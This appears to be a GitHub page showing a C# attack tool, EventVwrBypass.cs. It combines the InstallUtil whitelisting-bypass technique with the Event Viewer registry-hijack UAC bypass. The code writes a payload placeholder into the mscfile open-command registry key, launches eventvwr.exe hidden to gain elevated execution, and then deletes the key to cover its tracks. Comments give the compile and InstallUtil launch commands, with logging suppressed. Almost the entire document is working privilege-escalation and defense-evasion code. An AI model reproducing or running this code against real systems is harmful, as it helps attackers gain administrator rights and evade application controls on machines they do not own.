-
Notifications
You must be signed in to change notification settings - Fork 164
/
Copy pathEventVwrBypass.cs
64 lines (51 loc) · 2.17 KB
/
EventVwrBypass.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
Credits:
- @subTee for InstallUtil technique
- @enigma0x3 for Event Viewer UAC bypass
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EventVwrBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U EventVwrBypass.exe"
*/
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer {
public override void Uninstall(System.Collections.IDictionary savedState) {
Console.WriteLine("Hello There From Uninstall");
Unlocker.Exec();
}
}
public class Unlocker {
public static void Main() {
Console.WriteLine("Hello from Main");
}
public static void Exec() {
RegistryKey key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"Software\Classes\mscfile\shell\open\command", true);
key.SetValue("", "<PAYLOAD>", Microsoft.Win32.RegistryValueKind.String);
key.Close();
Console.WriteLine("Key has been created");
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
p.StartInfo.FileName = @"C:\Windows\System32\eventvwr.exe";
p.Start();
Console.WriteLine("Event Viewer is starting up");
System.Threading.Thread.Sleep(5000);
try {
p.Kill();
Console.WriteLine("Killing Event Viewer");
}
catch(Exception ex) {
Console.WriteLine("Event Viewer no longer running");
}
Console.WriteLine("Cleaning up...");
key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(@"Software\Classes", true);
key.DeleteSubKeyTree("mscfile");
key.Close();
Console.WriteLine("Complete");
}
}